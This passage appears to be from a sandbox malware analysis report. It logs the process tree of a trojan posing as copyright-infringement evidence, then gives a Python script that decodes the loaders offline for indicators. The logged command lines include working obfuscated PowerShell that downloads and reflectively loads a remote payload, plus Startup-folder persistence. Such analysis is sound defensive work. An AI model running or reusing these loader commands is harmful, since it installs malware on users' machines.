'+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
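The two loader command lines recorded above (the `-F [cHar]39,[cHar]92,[cHar]36,[cHar]34` form and the `-cREPlACe ... |iex` form) and the `$Codigo` wrapper that spawns them can be unpacked offline without executing anything. The following Python is an added example, not part of this report or of the sandbox; the two command lines it decodes are constructed, shortened copies of the ones recorded above that keep every obfuscation primitive, `CODIGO_PREFIX` is the first 24 characters of the `$Codigo` value recorded above, and the `C:\Windows\system32\cmd.exe` value assumed for `$env:COMSPEC` is a guess about the victim host. The first argument handed to `VAI()` is reversed back because it reads as a URL written backwards.

```python
import base64
import re

# Layers, outermost first, as they appear in the process tree above:
#  0. $Codigo = '<base64>'; [Text.Encoding]::Unicode.GetString(FromBase64String(..))
#  1a. ('..'+'..') -F [char]39,[char]92,[char]36,[char]34   -> {0}=' {1}=\ {2}=$ {3}="
#  1b. ('..'+'..') -cReplace 'CSE','$' -cReplace 'oNI','"' -cReplace 'Kks',"'" -Replace '1lp','\'
#  2.  $url=..; DownloadString; FromBase64String; [Reflection.Assembly]::Load; VAI(<reversed url>, ..)
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)                 # [cHar]39, [CHAr]92 ...
PIECE_RE = re.compile(r"'([^']*)'")                             # one '..' fragment of the + chain
OP_RE = re.compile(r"\)\s*-(f|c?replace)\b", re.I)              # where the string expression ends
REPL_RE = re.compile(
    r"-(c?)replace\s+(\([^)]*\)|'[^']*')\s*,\s*(\[char\]\d+|'[^']*')", re.I)


def decode_unicode_base64(blob: str) -> str:
    """Layer 0: [Text.Encoding]::Unicode is UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def encode_unicode_base64(script: str) -> str:
    """Inverse of layer 0, i.e. how a $Codigo value is produced."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def comspec_chars(indexes, comspec=r"C:\Windows\system32\cmd.exe") -> str:
    """$env:COMSPEC[4,15,25] -join '' picks letters out of the cmd.exe path
    (assumed value; PowerShell resolves the resulting command name case-insensitively)."""
    return "".join(comspec[i] for i in indexes)


def _operand(text: str) -> str:
    """A -replace operand is 'literal', [char]N or ([char]A+[char]B+...)."""
    text = text.strip()
    if text.startswith("'"):
        return text.strip("'")
    return "".join(chr(int(n)) for n in CHAR_RE.findall(text))


def unwrap_layer1(cmd: str) -> str:
    """Join the '..'+'..' fragments, then apply the -F format call (1a) or the
    -cReplace/-Replace token chain (1b) in the order PowerShell would."""
    m = OP_RE.search(cmd)
    if m is None:
        raise ValueError("no -F or -replace operator found")
    template = "".join(PIECE_RE.findall(cmd[: m.start()]))
    tail = cmd[m.start():]
    if m.group(1).lower() == "f":
        args = [chr(int(n)) for n in CHAR_RE.findall(tail)]
        return re.sub(r"\{(\d+)\}", lambda x: args[int(x.group(1))], template)
    script = template
    for case_sensitive, pat, rep in REPL_RE.findall(tail):
        flags = 0 if case_sensitive else re.I                   # -cReplace vs -Replace
        # -replace takes a regex; these tokens are plain letters, and a callable
        # replacement keeps the injected '$' and '\' literal.
        script = re.sub(re.escape(_operand(pat)), lambda _, r=_operand(rep): r,
                        script, flags=flags)
    return script


def extract_iocs(script: str) -> dict:
    """Layer 2: stage-2 URL, the VAI() argument list and the reversed stage-3 URL."""
    url = re.search(r"\$url\s*=\s*'([^']+)'", script).group(1)
    vai_args = re.findall(r'"([^"]*)"', script.split("::VAI(", 1)[1])
    return {"stage2_url": url, "vai_args": vai_args, "stage3_url": vai_args[0][::-1]}


# Constructed, shortened copies of the two loader command lines recorded above.
FORMAT_CMD = (
    ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'githubuser"
    "content.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt{0}; '+'{2}bas'"
    "+'e64Content = (New-Object System.Net.WebClient).DownloadString({2}url); {2}binary"
    "Content = [System.Convert]::FromBase64String({2}base64Content); '+'{2}assembly = "
    "[Reflection.Assembly]::Load({2}binaryContent); {2}command = {0}'+'[dnlib.IO.Home]"
    "::VAI({3}0/KSAcF/d/ee.etsap//:sptth{3}, {3}1{3}, {3}C:{1}Progr'+'amData{1}{3}, "
    "{3}rajado{3}, {3}AddInProcess32{3}, {3}desativado{3},{3}{3}){0}; '+'Invoke-Expr"
    "ession {2}command') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
)
REPLACE_CMD = (
    "(('CSE'+'url = '+'Kk'+'s'+'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn"
    "/refs/heads/main/DetahNote_J.txt'+'Kks; CSEbase64Content = (New-Object System.Net."
    "WebClient).DownloadString(CSEurl); CSEbinaryContent = [System.Convert]::FromBase64"
    "String(CSEbase64Content); '+'CSEassembly = [Reflection.Assembly]::Load(CSEbinaryCon"
    "tent); CSEcommand = Kks[dnlib.IO.Home]::VAI(oNI0/zbEuc/d/ee.etsap//:sptthoNI, oNI1"
    "oNI, oNIC:1lpProgramData1lpoNI, oNItondinhooNI, oNIAppLaunchoNI, oNIdesativadooNI,"
    "oNIoNI)Kks; Invoke-Expression CSEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),"
    "[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 "
    "-ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
)
# First 24 characters of the $Codigo value recorded above; decodes to "(('CSE'+'".
CODIGO_PREFIX = "KAAoACcAQwBTAEUAJwArACcA"

if __name__ == "__main__":
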